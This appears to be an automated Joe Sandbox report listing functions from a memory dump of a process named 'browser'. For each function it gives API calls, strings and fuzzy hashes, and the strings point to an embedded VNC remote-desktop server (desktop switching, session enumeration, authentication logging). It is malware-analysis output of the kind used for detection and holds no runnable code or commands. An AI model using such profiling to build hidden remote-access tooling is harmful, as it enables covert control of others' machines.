Someone, xrefs: 00007FF790C35655
Plugin.dsm, xrefs: 00007FF790C35668

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: sprintf$CriticalInitializeSection$_errno_invalid_parameter_noinfo
String ID: 0.0.0$12-12-2002$Plugin.dsm$Someone$Unknown
API String ID: 524037307-261918508
Opcode ID: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
Instruction ID: 3a06912c3fa286f737f24fe59e9f16755b978fd8f8b993552be3081a8700de6d
Opcode Fuzzy Hash: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
Instruction Fuzzy Hash: D221EE32524B8291D711DF34E9842E8B3BCFF54B88F985136DA4C4A669DF78E695C330

Function 00007FF790C56A3E Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 269COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF790C5407F
CloseDesktop.USER32 ref: 00007FF790C540C2
CloseHandle.KERNEL32 ref: 00007FF790C56A88
CloseHandle.KERNEL32 ref: 00007FF790C56B01
LeaveCriticalSection.KERNEL32 ref: 00007FF790C57BAC

Strings

vncclient.cpp : vncClientThread , xrefs: 00007FF790C54029
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF790C54060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF790C5409A
vncservice.cpp : SelectDesktop , xrefs: 00007FF790C5404B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Close$DesktopHandle$CriticalInputLeaveOpenSection
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 4065787043-3977938048
Opcode ID: 04e07c99e75fd332ae890d3068c7bd0c23d8647f6ad6a6f5c875c601342f21c4
Instruction ID: 458886490600695ff2c2e942c01a0b7149862fdab640e427005a7144f00ddb66
Opcode Fuzzy Hash: 04e07c99e75fd332ae890d3068c7bd0c23d8647f6ad6a6f5c875c601342f21c4
Instruction Fuzzy Hash: 25E1C226A1CA8185E764AB35C4587FEB7A1EF82B98F954235CA5C473E5CF38F481C720

Function 00007FF790C55709 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 264COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF790C5407F
CloseDesktop.USER32 ref: 00007FF790C540C2

Strings

enabled, xrefs: 00007FF790C5575E
disabled, xrefs: 00007FF790C5576C
vncclient.cpp : vncClientThread , xrefs: 00007FF790C54029
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF790C54060
vncclient.cpp : rfbSetServerInput: inputs %s, xrefs: 00007FF790C55777
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF790C5409A
vncservice.cpp : SelectDesktop , xrefs: 00007FF790C5404B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Desktop$CloseInputOpen
String ID: disabled$enabled$vncclient.cpp : rfbSetServerInput: inputs %s$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 1367241101-2270697846
Opcode ID: edf9ddcd9a44aa48138f766378103f1c8a97073988da45d501d29b27bb572098
Instruction ID: 681820678fc7fe2cd98ae7d90d14f3851576eaa79dc822aaaaedefb5184c343e
Opcode Fuzzy Hash: edf9ddcd9a44aa48138f766378103f1c8a97073988da45d501d29b27bb572098
Instruction Fuzzy Hash: A8D19F26A2C6D185E760EB35C4587FEABA1EF86B88F954131CA4C477A5CF38F485C720

Function 00007FF790C4FC70 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153threadCOMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 00007FF790C4FCD7
inet_ntoa.WS2_32 ref: 00007FF790C4FCE1

Part of subcall function 00007FF790CE7978: malloc.LIBCMT ref: 00007FF790CE7992

Part of subcall function 00007FF790C9CEF0: getpeername.WS2_32 ref: 00007FF790C9CF19
Part of subcall function 00007FF790C9CEF0: inet_ntoa.WS2_32 ref: 00007FF790C9CF23

Part of subcall function 00007FF790CE92A4: malloc.LIBCMT ref: 00007FF790CE92C7

OpenInputDesktop.USER32 ref: 00007FF790C4FE74
GetCurrentThreadId.KERNEL32 ref: 00007FF790C4FE7D
GetThreadDesktop.USER32 ref: 00007FF790C4FE85
SetThreadDesktop.USER32 ref: 00007FF790C4FE91

Part of subcall function 00007FF790C4A810: DialogBoxParamA.USER32 ref: 00007FF790C4A838

SetThreadDesktop.USER32 ref: 00007FF790C4FEB0
CloseDesktop.USER32 ref: 00007FF790C4FEB9

Strings

<unavailable>, xrefs: 00007FF790C4FCE7
Default, xrefs: 00007FF790C4FD3D

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$getpeernameinet_ntoamalloc$CloseCurrentDialogInputOpenParam
String ID: <unavailable>$Default
API String ID: 424836046-797050109
Opcode ID: b6dcc162a7e479665caaa1ca1c29d76cb599ba534f3a498a10e17cfeb49c5b9b
Instruction ID: 8a64729962e2292054b21c723444509650554044141103ae7e6b7317a7d08295
Opcode Fuzzy Hash: b6dcc162a7e479665caaa1ca1c29d76cb599ba534f3a498a10e17cfeb49c5b9b
Instruction Fuzzy Hash: 72616022A18A4681EB70AB35D4942BDB3A5FF85F85F844135DE0E477A5DF3CE946C320

Function 00007FF790C41A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 98libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF790C41A9D
GetProcAddress.KERNEL32 ref: 00007FF790C41ABA
LoadLibraryA.KERNEL32 ref: 00007FF790C41AD7
GetProcAddress.KERNEL32 ref: 00007FF790C41AF4
FreeLibrary.KERNEL32 ref: 00007FF790C41B9E
FreeLibrary.KERNEL32 ref: 00007FF790C41BAD

Strings

winlogon.exe, xrefs: 00007FF790C41B50
WTSFreeMemory, xrefs: 00007FF790C41AEA
WTSEnumerateProcessesA, xrefs: 00007FF790C41AB0
wtsapi32, xrefs: 00007FF790C41A96, 00007FF790C41AD0

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: WTSEnumerateProcessesA$WTSFreeMemory$winlogon.exe$wtsapi32
API String ID: 145871493-4162899161
Opcode ID: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
Instruction ID: 8b7af18ad0a010debc337181dcdc9a5a6e8ede2044fd0b09a47c61f27f88f126
Opcode Fuzzy Hash: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
Instruction Fuzzy Hash: 0C418D32629B4286E664AF35E8402A9B2B5FF86BA0F945235DD9D03754EF38F445C310

Function 00007FF790C42520 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF790C42551
GetProcAddress.KERNEL32 ref: 00007FF790C4256E
LoadLibraryA.KERNEL32 ref: 00007FF790C4258B
GetProcAddress.KERNEL32 ref: 00007FF790C425A8
FreeLibrary.KERNEL32 ref: 00007FF790C42658
FreeLibrary.KERNEL32 ref: 00007FF790C42667

Strings

WTSEnumerateSessionsA, xrefs: 00007FF790C42564
WTSFreeMemory, xrefs: 00007FF790C4259E
Console, xrefs: 00007FF790C42605
wtsapi32, xrefs: 00007FF790C4254A, 00007FF790C42584

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Console$WTSEnumerateSessionsA$WTSFreeMemory$wtsapi32
API String ID: 145871493-4083478734
Opcode ID: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
Instruction ID: fa3ea3a53848666ebca85e70a1a118d962b653d4c9ba47771535bd37dde5be83
Opcode Fuzzy Hash: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
Instruction Fuzzy Hash: 98416E32A29B4285EA74EF35E8402EAF2A5FF85750FD90135D99D43794DF38F494C620

Function 00007FF790C50430 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 86libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF790C50481
LoadLibraryA.KERNEL32 ref: 00007FF790C504CD

Part of subcall function 00007FF790CEA220: _errno.LIBCMT ref: 00007FF790CEA168
Part of subcall function 00007FF790CEA220: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CEA173

GetModuleFileNameA.KERNEL32 ref: 00007FF790C504F5
LoadLibraryA.KERNEL32 ref: 00007FF790C50541
GetProcAddress.KERNEL32 ref: 00007FF790C50559
FreeLibrary.KERNEL32 ref: 00007FF790C5057A

Strings

\logging.dll, xrefs: 00007FF790C504AA, 00007FF790C5051E
LOGFAILED, xrefs: 00007FF790C504DF
LOGLOGON, xrefs: 00007FF790C5054F
vncclient.cpp : authentication failed, xrefs: 00007FF790C5045F

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Library$FileLoadModuleName$AddressFreeProc_errno_invalid_parameter_noinfo
String ID: LOGFAILED$LOGLOGON$\logging.dll$vncclient.cpp : authentication failed
API String ID: 2822070703-2230024269
Opcode ID: 7268cd8e022df83657ed39b417004c309e717e39cebfd43f9550cd34ab281d12
Instruction ID: be8d26162e91d4034e03bf6b30799791419c4adbc29c4dbc0215fe2bad0806d6
Opcode Fuzzy Hash: 7268cd8e022df83657ed39b417004c309e717e39cebfd43f9550cd34ab281d12
Instruction Fuzzy Hash: C9414425628B8181EB74EB35E8542A9E7A0FF89791FD05235DA5D43B94EF3CF504CB20

Function 00007FF790C9A4A0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 70COMMON

Download Yara Rule

APIs

OpenDesktopA.USER32 ref: 00007FF790C9A4ED

Part of subcall function 00007FF790C9A3B0: GetCurrentThreadId.KERNEL32 ref: 00007FF790C9A3E3
Part of subcall function 00007FF790C9A3B0: GetThreadDesktop.USER32 ref: 00007FF790C9A3EB
Part of subcall function 00007FF790C9A3B0: GetUserObjectInformationA.USER32 ref: 00007FF790C9A411

OpenInputDesktop.USER32(?,?,?,00007FF790C5F09C), ref: 00007FF790C9A50B
CloseDesktop.USER32(?,?,?,00007FF790C5F09C), ref: 00007FF790C9A556
CloseDesktop.USER32(?,?,?,00007FF790C5F09C), ref: 00007FF790C9A58F

Strings

vncservice.cpp : SelectDesktop failed to close desktop, xrefs: 00007FF790C9A560
vncservice.cpp : OpenInputdesktop2 , xrefs: 00007FF790C9A522
vncservice.cpp : OpenInputdesktop2 named, xrefs: 00007FF790C9A4D3
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF790C9A4F5
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF790C9A53B
vncservice.cpp : SelectDesktop , xrefs: 00007FF790C9A4B0

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Desktop$CloseOpenThread$CurrentInformationInputObjectUser
String ID: vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : OpenInputdesktop2 named$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
API String ID: 82840795-1493190668
Opcode ID: 73df31c4d5bc5f508eb8bf5ae158792ec5ac75f1685a591efa5a54c35b3d65c6
Instruction ID: b3f3584c902c268008b85438822ff12e7d8428b585e050d8687202eff0d3bc06
Opcode Fuzzy Hash: 73df31c4d5bc5f508eb8bf5ae158792ec5ac75f1685a591efa5a54c35b3d65c6
Instruction Fuzzy Hash: D1217364F38A4380FB75BB36B9401F5E361AF95744FC86031D91E46355EE3CF55182A0

Function 00007FF790C60700 Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49threadsleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32 ref: 00007FF790C6071E
Sleep.KERNEL32 ref: 00007FF790C6072C
IsWindow.USER32 ref: 00007FF790C60735
GetCurrentThread.KERNEL32 ref: 00007FF790C60744
SetThreadPriority.KERNEL32 ref: 00007FF790C6074F
WaitForSingleObject.KERNEL32 ref: 00007FF790C60768
PostMessageA.USER32 ref: 00007FF790C60780
IsWindow.USER32 ref: 00007FF790C60789
CloseHandle.KERNEL32 ref: 00007FF790C607A6

Strings

VncEvent, xrefs: 00007FF790C60710

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ThreadWindow$CloseCurrentEventHandleMessageObjectOpenPostPrioritySingleSleepWait
String ID: VncEvent
API String ID: 2428488660-2681191898
Opcode ID: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
Instruction ID: 80af6395a2416f3c8cfbcf25bba525606514cfb64d2d0710a80b974620f4150f
Opcode Fuzzy Hash: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
Instruction Fuzzy Hash: 42114214F2CA4342FB74AB31A9543BAE2F1BF8AB85F986034C90E56794DE2CF4458720

Function 00007FF790C9C970 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF790C9C988
InitializeCriticalSection.KERNEL32 ref: 00007FF790C9C992
InitializeCriticalSection.KERNEL32 ref: 00007FF790C9C99F
LoadLibraryA.KERNEL32 ref: 00007FF790C9CA03
GetProcAddress.KERNEL32 ref: 00007FF790C9CA1F
GetProcAddress.KERNEL32 ref: 00007FF790C9CA3A

Strings

SetPerTcpConnectionEStats, xrefs: 00007FF790C9CA2C
vsocket.cpp : VSocket() m_pDSMPlugin = NULL , xrefs: 00007FF790C9C9A5
GetPerTcpConnectionEStats, xrefs: 00007FF790C9CA15
Iphlpapi.dll, xrefs: 00007FF790C9C9C7

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection$AddressProc$LibraryLoad
String ID: GetPerTcpConnectionEStats$Iphlpapi.dll$SetPerTcpConnectionEStats$vsocket.cpp : VSocket() m_pDSMPlugin = NULL
API String ID: 3015439405-2946900448
Opcode ID: b5c9a895933125692294ff2e15cdf7522bd1a19dbcf515155b618464db81f3f7
Instruction ID: af9f68bf48088355ffde2ce00e72d8170b8c10f9a72b9dddc159c800c407537c
Opcode Fuzzy Hash: b5c9a895933125692294ff2e15cdf7522bd1a19dbcf515155b618464db81f3f7
Instruction Fuzzy Hash: 80211A76924B8281DB10EF34E8941A8B3B4FB55B08F94A035CE5D17364EF3CE559C360

Function 00007FF790CFD304 Relevance: 16.8, APIs: 11, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF790CFD32C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF790CFD337
__wtomb_environ.LIBCMT ref: 00007FF790CFD419
_errno.LIBCMT ref: 00007FF790CFD422
free.LIBCMT ref: 00007FF790CFD513
SetEnvironmentVariableA.KERNEL32 ref: 00007FF790CFD644
_errno.LIBCMT ref: 00007FF790CFD651
free.LIBCMT ref: 00007FF790CFD65F
free.LIBCMT ref: 00007FF790CFD66C
free.LIBCMT ref: 00007FF790CFD693

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: free$_errno$EnvironmentVariable__wtomb_environ_invalid_parameter_noinfo
String ID:
API String ID: 101574016-0
Opcode ID: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
Instruction ID: 26a368625e220433a703d11b43d6d78ad2049c082612259dd96a672941b9ed9c
Opcode Fuzzy Hash: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
